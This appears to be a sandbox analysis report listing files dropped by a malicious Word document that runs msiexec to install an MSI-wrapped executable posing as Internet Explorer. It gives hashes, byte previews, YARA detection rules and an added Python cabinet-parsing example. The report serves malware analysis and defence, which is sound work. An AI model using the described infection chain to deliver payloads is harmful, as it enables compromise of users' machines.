                                                                  Preview:MSCF....l^......,...............}?..D........^.........T.. .TRY.exe..`.(....MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b1F.._..._..._..kZ..._..k\..._..k[..._..k^..._...^.d._..kW..._..k...._..k]..._.Rich.._.................PE..d.....&.........."......t...........y.........@.....................................H....`.......... ......................................,................................... .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ............\..............@..B............................................................................................................................................................................................
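Added example (not Joe Sandbox's code and not the sample's): the report lists a 155244-byte cabinet holding one file, which expand.exe turns into the 155136-byte PE32+ TRY.exe below. The 108-byte difference is exactly the fixed overhead of a single-file cabinet whose folder is stored rather than compressed: a 36-byte CFHEADER, an 8-byte CFFOLDER, a 16-byte CFFILE plus the 8-byte "TRY.exe\0" name, and five 8-byte CFDATA headers for the five 32 KiB blocks needed to carry 155136 bytes. That also explains why the cabinet and the executable have almost identical entropy and why the preview shows the MZ header right after the file name. The script below builds such a cabinet around a constructed 155136-byte placeholder (not the real TRY.exe), parses it, extracts the file and checks the arithmetic; the structure layouts are those of the Microsoft Cabinet format, the setID and checksums are arbitrary, and the function names are this example's own.

```python
import struct
from typing import Any, Dict, List, Tuple

# Fixed-size structures of the Microsoft Cabinet format (little-endian).
CFHEADER = struct.Struct("<4sIIIIIBBHHHHH")  # 36 bytes: signature .. iCabinet
CFFOLDER = struct.Struct("<IHH")             # 8 bytes: coffCabStart, cCFData, typeCompress
CFFILE = struct.Struct("<IIHHHH")            # 16 bytes, followed by the NUL-terminated name
CFDATA = struct.Struct("<IHH")               # 8 bytes: csum, cbData, cbUncomp, then payload
MAX_UNCOMP = 0x8000        # largest cbUncomp a single CFDATA block may carry (32 KiB)
TCOMP_NONE = 0             # low nibble of typeCompress: stored, no compression
RESERVE_PRESENT = 0x0004   # CFHEADER flag for optional reserve fields (not handled here)

# Constructed placeholder for the dropped TRY.exe: the report's size (155136 bytes) and an
# "MZ" prefix, but filler bytes rather than the real sample.
SAMPLE_PAYLOAD = (b"MZ" + bytes(range(256)) * 607)[:155136]


def stored_cab_size(file_size: int, name: str) -> int:
    """Size of a one-folder, one-file cabinet whose folder is stored (typeCompress 0)."""
    blocks = -(-file_size // MAX_UNCOMP)  # ceiling division
    return (CFHEADER.size + CFFOLDER.size + CFFILE.size + len(name.encode("ascii")) + 1
            + blocks * CFDATA.size + file_size)


def build_stored_cab(name: str, data: bytes, set_id: int = 0) -> bytes:
    """Build a minimal single-file cabinet with an uncompressed folder (csum left at 0)."""
    blocks = [data[i:i + MAX_UNCOMP] for i in range(0, len(data), MAX_UNCOMP)]
    sz_name = name.encode("ascii") + b"\0"
    coff_files = CFHEADER.size + CFFOLDER.size           # CFFILE table follows the folder table
    coff_data = coff_files + CFFILE.size + len(sz_name)  # first CFDATA follows the file table
    cfdata = b"".join(CFDATA.pack(0, len(b), len(b)) + b for b in blocks)
    total = coff_data + len(cfdata)
    header = CFHEADER.pack(b"MSCF", 0, total, 0, coff_files, 0, 3, 1, 1, 1, 0, set_id, 0)
    folder = CFFOLDER.pack(coff_data, len(blocks), TCOMP_NONE)
    cffile = CFFILE.pack(len(data), 0, 0, 0, 0, 0x20) + sz_name  # attribs 0x20 = archive
    return header + folder + cffile + cfdata


def parse_cab(blob: bytes) -> Dict[str, Any]:
    """Parse CFHEADER, the CFFOLDER table and the CFFILE table of a plain cabinet."""
    (sig, _r1, cb_cabinet, _r2, coff_files, _r3, v_minor, v_major,
     n_folders, n_files, flags, set_id, _icab) = CFHEADER.unpack_from(blob, 0)
    if sig != b"MSCF":
        raise ValueError("missing MSCF signature")
    if cb_cabinet != len(blob):
        raise ValueError(f"cbCabinet says {cb_cabinet} bytes, got {len(blob)}")
    if flags & RESERVE_PRESENT:
        raise ValueError("cabinets with reserve fields are not handled")
    folders = [CFFOLDER.unpack_from(blob, CFHEADER.size + i * CFFOLDER.size)
               for i in range(n_folders)]
    files: List[Tuple[str, int, int, int]] = []  # (name, cbFile, iFolder, uoffFolderStart)
    off = coff_files
    for _ in range(n_files):
        cb_file, uoff, i_folder, _date, _time, _attribs = CFFILE.unpack_from(blob, off)
        off += CFFILE.size
        end = blob.index(b"\0", off)
        files.append((blob[off:end].decode("latin-1"), cb_file, i_folder, uoff))
        off = end + 1
    return {"cbCabinet": cb_cabinet, "version": (v_major, v_minor), "setID": set_id,
            "folders": folders, "files": files}


def extract_stored(blob: bytes, info: Dict[str, Any], index: int = 0) -> bytes:
    """Reassemble one file from a stored folder by concatenating its CFDATA payloads."""
    name, cb_file, i_folder, uoff = info["files"][index]
    coff, n_blocks, type_compress = info["folders"][i_folder]
    if type_compress & 0x000F != TCOMP_NONE:
        raise ValueError(f"{name}: compression type {type_compress & 0xF}, not stored")
    out = bytearray()
    off = coff
    for _ in range(n_blocks):
        _csum, cb_data, cb_uncomp = CFDATA.unpack_from(blob, off)
        if cb_data != cb_uncomp:
            raise ValueError("stored block with cbData != cbUncomp")
        off += CFDATA.size
        out += blob[off:off + cb_data]
        off += cb_data
    return bytes(out[uoff:uoff + cb_file])


if __name__ == "__main__":
    cab = build_stored_cab("TRY.exe", SAMPLE_PAYLOAD)
    info = parse_cab(cab)
    print(len(cab), stored_cab_size(155136, "TRY.exe"), info["files"], info["folders"])
    print(extract_stored(cab, info) == SAMPLE_PAYLOAD)
```

To inspect a real dropped cabinet, pass open(path, "rb").read() to parse_cab; folders that use MSZIP or LZX raise in extract_stored rather than being mis-extracted, and for those expand.exe or cabextract is the right tool.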
                                                                  Process:C:\Windows\SysWOW64\expand.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):155136
                                                                  Entropy (8bit):6.821026780783546
                                                                  Encrypted:false
                                                                  SSDEEP:3072:fvGygixsiq1P5GWp1icKAArDZz4N9GhbkrNEk1Yq:BvEp0yN90QEm
                                                                  MD5:96DF7B0C491646EFC2E5F2E9F0443B8B
                                                                  SHA1:560F0295ABE71FEFFF38912C1121B27E40237FE5
                                                                  SHA-256:4B61C222D3F7CCF59F510B0780B3907FA71A7AA5EA68B9B966C69157444E78F7
                                                                  SHA-512:E9CD488EAB24A8D7860F363BF1F84B8205A68017B54F049489EF4FBD77EC51A1BFCF62219A8BC027BD7D103ED347DE3A4AFB138A2BFA609E081B7153D3C84DD6
                                                                  Malicious:false
                                                                  Joe Sandbox View:
• Filename: 2543_0008858249_FWDOUTSTANDING_20210420.doc, Detection: malicious
• Filename: 2543_0008858249_FWDOUTSTANDING_20210420.doc, Detection: malicious
• Filename: 2543_0008858249_FWDOUTSTANDING_20210420.doc, Detection: malicious
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b1F.._..._..._..kZ..._..k\..._..k[..._..k^..._...^.d._..kW..._..k...._..k]..._.Rich.._.................PE..d.....&.........."......t...........y.........@.....................................H....`.......... ......................................,................................... .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ............\..............@..B........................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\expand.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):155136
                                                                  Entropy (8bit):6.821026780783546
                                                                  Encrypted:false
                                                                  SSDEEP:3072:fvGygixsiq1P5GWp1icKAArDZz4N9GhbkrNEk1Yq:BvEp0yN90QEm
                                                                  MD5:96DF7B0C491646EFC2E5F2E9F0443B8B
                                                                  SHA1:560F0295ABE71FEFFF38912C1121B27E40237FE5
                                                                  SHA-256:4B61C222D3F7CCF59F510B0780B3907FA71A7AA5EA68B9B966C69157444E78F7
                                                                  SHA-512:E9CD488EAB24A8D7860F363BF1F84B8205A68017B54F049489EF4FBD77EC51A1BFCF62219A8BC027BD7D103ED347DE3A4AFB138A2BFA609E081B7153D3C84DD6
                                                                  Malicious:false
                                                                  Joe Sandbox View:
• Filename: 2543_0008858249_FWDOUTSTANDING_20210420.doc, Detection: malicious
• Filename: 2543_0008858249_FWDOUTSTANDING_20210420.doc, Detection: malicious
• Filename: 2543_0008858249_FWDOUTSTANDING_20210420.doc, Detection: malicious
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b1F.._..._..._..kZ..._..k\..._..k[..._..k^..._...^.d._..kW..._..k...._..k]..._.Rich.._.................PE..d.....&.........."......t...........y.........@.....................................H....`.......... ......................................,................................... .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ............\..............@..B........................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):1412
                                                                  Entropy (8bit):3.6357831688439908
                                                                  Encrypted:false
                                                                  SSDEEP:24:f3dX8DW8dfja/0vZ4MBlolESIFEqHmnqHmLyDqHmVo+TGTlh+Bl/rB:fe7Z4MB6lmFxGqGL7GjklS/V
                                                                  MD5:CE0A48B68AFABF1CB63A84452E99662A
                                                                  SHA1:D79EB8F957A252FB363FF36F67B39E1FA1524468
                                                                  SHA-256:4C86CD17EDA9F4A42B361023E7AE6E1CCCEE9AEB547F375A3D2936217A5ED713
                                                                  SHA-512:AB8D97D03F2EF4BE45CD7CEABE8ACE93FF9266BFCA6CB4D939A06F9E8A57343C5CE559BDB004A4D81ABAC3AB7ADE9B6D9761014B0F60A27871FB60E0E8CC6B16
                                                                  Malicious:false
                                                                  Preview:W.r.a.p.p.e.d.A.p.p.l.i.c.a.t.i.o.n.I.d.=...W.r.a.p.p.e.d.R.e.g.i.s.t.r.a.t.i.o.n.=.H.i.d.d.e.n...I.n.s.t.a.l.l.S.u.c.c.e.s.s.C.o.d.e.s.=.0...E.l.e.v.a.t.i.o.n.M.o.d.e.=.a.d.m.i.n.i.s.t.r.a.t.o.r.s...B.a.s.e.N.a.m.e.=.T.R.Y...e.x.e...C.a.b.H.a.s.h.=.8.a.6.4.b.6.6.f.6.7.d.4.c.1.9.9.1.5.4.6.5.9.b.5.b.b.4.4.8.1.7.3.b.4.6.c.1.a.d.b.1.b.2.f.9.a.e.2.4.c.e.f.f.1.7.c.8.5.8.b.9.6.d.5...S.e.t.u.p.P.a.r.a.m.e.t.e.r.s.=...W.o.r.k.i.n.g.D.i.r.=...C.u.r.r.e.n.t.D.i.r.=.*.S.O.U.R.C.E.D.I.R.*...U.I.L.e.v.e.l.=.2...F.o.c.u.s.=.n.o...S.e.s.s.i.o.n.D.i.r.=.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.5.8.b.8.4.a.1.d.-.9.a.6.6.-.4.a.e.e.-.8.a.4.3.-.f.e.b.2.0.6.e.0.8.9.b.1.\...F.i.l.e.s.D.i.r.=.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.5.8.b.8.4.a.1.d.-.9.a.6.6.-.4.a.e.e.-.8.a.4.3.-.f.e.b.2.0.6.e.0.8.9.b.1.\.f.i.l.e.s.\...R.u.n.B.e.f.o.r.e.I.n.s.t.a.l.l.F.i.l.e.=...R.u.n.B.e.f.o.r.e.I.n.s.t.a.l.l.P.a.r.a.m.e.t.e.r.s.=...R.u.n.A.f.t.e.r.I.n.s.t.a.
                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                  Malicious:false
                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                  Malicious:false
                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):26624
                                                                  Entropy (8bit):4.023285459983812
                                                                  Encrypted:false
                                                                  SSDEEP:384:G9FbvNwIWWwxN6rX0jb4e/9wCwQDtASlRGfafyZ:80WwGLc4elwx6Gfaf
                                                                  MD5:AEE6E4E3E1679CAB2BC9711D046AE750
                                                                  SHA1:EE2D2003C4E7208C030246BE3556934955D33100
                                                                  SHA-256:C1A2B5412658B2EDD4F423C35439CF69DFFCAD442AA2D786672A925ACAE064E7
                                                                  SHA-512:0C7723B855F42C78018352BB2533A2B4CD484352A4DECCD7AC5C2D19F067F6448F6E14DFCE182AC8129C091531E4E04B33B3DEF63562967F3D068A04F2D9C86C
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1, Description: Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts., Source: C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP, Author: Nils Kuhnert
                                                                  • Rule: SUSP_VBA_FileSystem_Access, Description: Detects suspicious VBA that writes to disk and is activated on document open, Source: C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP, Author: Florian Roth
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................0.............................................................................../...............#................... ...!...".......$...%...&...'...(...)...*...+...,...-.......1...........2...................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):0.14963723887749986
                                                                  Encrypted:false
                                                                  SSDEEP:48:6o6vwrfddSsPiK3ddSH9ZauSiCPiKe6NPiK:Wvq3/OAWiFt
                                                                  MD5:AC6A84118D10D91CB02AE02773436BFF
                                                                  SHA1:A630E822DD052856EDF8D5068E39C683F5BD5644
                                                                  SHA-256:EF15F83FD5723D8FB1470F93EAE79E858F4DDE5081A2EDE2B9271D915325C478
                                                                  SHA-512:84AC382BF232FF446F404024FF1CE14AEA8BFD33F7B4CFECC119FDEBD627F5C8ECBD7091047E4D2093730BCF9A63F282E847BF4729610C8D2BD3E43E2C0D521E
                                                                  Malicious:false
                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:53 2022, mtime=Tue Mar 8 15:45:53 2022, atime=Wed Apr 20 15:19:12 2022, length=62976, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):1164
                                                                  Entropy (8bit):4.5147077000165785
                                                                  Encrypted:false
                                                                  SSDEEP:24:88/XThOMPG/xfm+oeK8vvBlD+5Dv3qaqtT7qtk:88/XT4xxfRoH8iQaqlqG
                                                                  MD5:7ADD8F1D611B2857204C2BC42CC44A28
                                                                  SHA1:AC6C1E2E73C4AD815192F3229B2EB587FB9F1CAA
                                                                  SHA-256:E9A69AB15E044FE4045CF020AF86328465BDA02B387F8E6CC404D115E27A69A8
                                                                  SHA-512:626CE7ADFDD6F4B40A404599EC44B79EB95E42D0B6C7B0B21F0F4C6A4F2FC47AB74AE33E9732C0D9AE3A1EFE3E4521C0393E786604362425C20FEDF31F2A97A8
                                                                  Malicious:false
                                                                  Preview:L..................F.... ...E....3..E....3...{._.T...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......Tg. .12543_~1.DOC.........hT..hT..*...r.....'...............1.2.5.4.3._.0.0.0.8.8.5.8.2.4.9._.F.W.D.O.U.T.S.T.A.N.D.I.N.G._.2.0.2.0.0.6.0.4...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\179605\Users.user\Desktop\12543_0008858249_FWDOUTSTANDING_20200604.doc.C.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1.2.5.4.3._.0.0.0.8.8.5.8.2.4.9._.F.W.D.O.U.T.S.T.A.N.D.I.N.G._.2.0.2.0.0.6.0.4...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.
                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):131
                                                                  Entropy (8bit):4.970285316783502
                                                                  Encrypted:false
                                                                  SSDEEP:3:bDuMJlBPddqc6Kw7XVLR6YVomX1UXWddqc6Kw7XVLR6YVov:bCUPddqc6N7Xy4cXWddqc6N7Xy4y
                                                                  MD5:AC465E397B58BF09906407F06803641B
                                                                  SHA1:91C663F69C167B45184DB10BE2368073F56B7DD6
                                                                  SHA-256:9F3CFAB15CF36A28AFD1552EEEF61449EBD28BEC40F42BA88E2FD86859F3D023
                                                                  SHA-512:C0BCF40F37E7FAAB60C4822663B95F232003CDF8B701444B741AFB5271410C1FFBC9F76E1D8879470D6A35E557C5C2D370513E993CF7CB626A9750A31B03F65C
                                                                  Malicious:false
                                                                  Preview:[folders]..Templates.LNK=0..12543_0008858249_FWDOUTSTANDING_20200604.LNK=0..[doc]..12543_0008858249_FWDOUTSTANDING_20200604.LNK=0..
                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):162
                                                                  Entropy (8bit):2.503835550707525
                                                                  Encrypted:false
                                                                  SSDEEP:3:vrJlaCkWtVyEJbiJk/p2TKWWhMGHiV/ln:vdsCkWttViJkh2TKHM9V/l
                                                                  MD5:C5E24006AFAC8C2659023AD09A07EB0F
                                                                  SHA1:4B7B834BEDADFD0A2764743E021D40C55A51F284
                                                                  SHA-256:7C9E6D71E3F53D37A78CCE23FA21D259365A9571C6C3A01E8D216586177BA87E
                                                                  SHA-512:673649AF8318514414758F92756D408FB6F0CA4859CB2994A921E288126561A7B4EB3C7D824CC90352D939952EA167A473A4282838362B36E85B701A4B582396
                                                                  Malicious:false
                                                                  Preview:.user..................................................A.l.b.u.s.............p........16..............26.............@36..............36.....z.......p46.....x...
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):8016
                                                                  Entropy (8bit):3.582679871894779
                                                                  Encrypted:false
                                                                  SSDEEP:96:chQCwMqKqvsqvJCwoEz8hQCwMqKqvsEHyqvJCwor6zYeYnHnxyNplUVWxL:c2joEz823Hnor6zYBxyNLxL
                                                                  MD5:DB998D75757CC341EFFADCB32C3A3537
                                                                  SHA1:77438083A9494757CB358471A9D01C1C81010DAA
                                                                  SHA-256:799694B7C9152F99776FE63DC6D0FDB46C41D411BD67814980F38F8CAE40181D
                                                                  SHA-512:1D2834BB1B0BD037AC058E53A93FA9B13854F686AF6CC36536ADD22B4C648787854587C8E42FC4523ED681C3F4D448214D88883A9AC848DB07FF8CB834DCBA51
                                                                  Malicious:false
                                                                  Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):8016
                                                                  Entropy (8bit):3.582679871894779
                                                                  Encrypted:false
                                                                  SSDEEP:96:chQCwMqKqvsqvJCwoEz8hQCwMqKqvsEHyqvJCwor6zYeYnHnxyNplUVWxL:c2joEz823Hnor6zYBxyNLxL
                                                                  MD5:DB998D75757CC341EFFADCB32C3A3537
                                                                  SHA1:77438083A9494757CB358471A9D01C1C81010DAA
                                                                  SHA-256:799694B7C9152F99776FE63DC6D0FDB46C41D411BD67814980F38F8CAE40181D
                                                                  SHA-512:1D2834BB1B0BD037AC058E53A93FA9B13854F686AF6CC36536ADD22B4C648787854587C8E42FC4523ED681C3F4D448214D88883A9AC848DB07FF8CB834DCBA51
                                                                  Malicious:false
                                                                  Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):8016
                                                                  Entropy (8bit):3.582679871894779
                                                                  Encrypted:false
                                                                  SSDEEP:96:chQCwMqKqvsqvJCwoEz8hQCwMqKqvsEHyqvJCwor6zYeYnHnxyNplUVWxL:c2joEz823Hnor6zYBxyNLxL
                                                                  MD5:DB998D75757CC341EFFADCB32C3A3537
                                                                  SHA1:77438083A9494757CB358471A9D01C1C81010DAA
                                                                  SHA-256:799694B7C9152F99776FE63DC6D0FDB46C41D411BD67814980F38F8CAE40181D
                                                                  SHA-512:1D2834BB1B0BD037AC058E53A93FA9B13854F686AF6CC36536ADD22B4C648787854587C8E42FC4523ED681C3F4D448214D88883A9AC848DB07FF8CB834DCBA51
                                                                  Malicious:false
                                                                  Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):162
                                                                  Entropy (8bit):2.503835550707525
                                                                  Encrypted:false
                                                                  SSDEEP:3:vrJlaCkWtVyEJbiJk/p2TKWWhMGHiV/ln:vdsCkWttViJkh2TKHM9V/l
                                                                  MD5:C5E24006AFAC8C2659023AD09A07EB0F
                                                                  SHA1:4B7B834BEDADFD0A2764743E021D40C55A51F284
                                                                  SHA-256:7C9E6D71E3F53D37A78CCE23FA21D259365A9571C6C3A01E8D216586177BA87E
                                                                  SHA-512:673649AF8318514414758F92756D408FB6F0CA4859CB2994A921E288126561A7B4EB3C7D824CC90352D939952EA167A473A4282838362B36E85B701A4B582396
                                                                  Malicious:false
                                                                  Preview:.user..................................................A.l.b.u.s.............p........16..............26.............@36..............36.....z.......p46.....x...
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):20480
                                                                  Entropy (8bit):1.6013944557991673
                                                                  Encrypted:false
                                                                  SSDEEP:48:Ks0AcDHPbuKPiKqQsddSH9ZauSiCPiKejddSsPiKVrpvWo:KsFb6qQ6OAWiq3Pv
                                                                  MD5:7C98B8E591E539177CC02866DD0D4140
                                                                  SHA1:620B461823FAF2BBF8F2E9124DA2878D73CF7849
                                                                  SHA-256:4BA4989BE7C8A499EA5EAB02CA287ECCF89A5BED08F075BE412142776E2B8721
                                                                  SHA-512:D3E8357262B3884D6C3AA5318070566DB3720AEA6E8D741CB6133DCF90102A8C3174CB369BEEE949CF4E10A7D911D48E3051E474CA32F07C4730FCC195297567
                                                                  Malicious:false
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 11.0.18362.1, Subject: Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {4982A61C-946D-4168-809C-13FF99C4C351}, Create Time/Date: Thu Feb 18 21:32:30 2021, Last Saved Time/Date: Thu Feb 18 21:32:30 2021, Number of Pages: 200, Number of Words: 2, Name of Creating Application: MSI Wrapper (10.0.50.0), Security: 2
                                                                  Category:dropped
                                                                  Size (bytes):491520
                                                                  Entropy (8bit):6.791342319398629
                                                                  Encrypted:false
                                                                  SSDEEP:6144:cytOIiRQYpgjpjew5LLyGx1qo8yppyN90PEGUEpKy/90QEc:cytMRQ+gjpjegLyo8Cy90V4w90i
                                                                  MD5:260BEC1B34CE96E5ED6C42D51E7146FB
                                                                  SHA1:57EC75201B4957B5C9F4266264E4A3C953255801
                                                                  SHA-256:29C51CD98EAE68D4E63941C8CE41EEDAC2FB18500CD00388EE8D29619CA3F160
                                                                  SHA-512:A8AED798334A8BD35802E3166823D434B292036D5F0BBBE9E2F3587A660F856FF0CE918C8665BD88FCF443BFFA816FDC8EF0D4B13DC5A00CC82D8DC77F50919C
                                                                  Malicious:false
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):212992
                                                                  Entropy (8bit):6.513444216841171
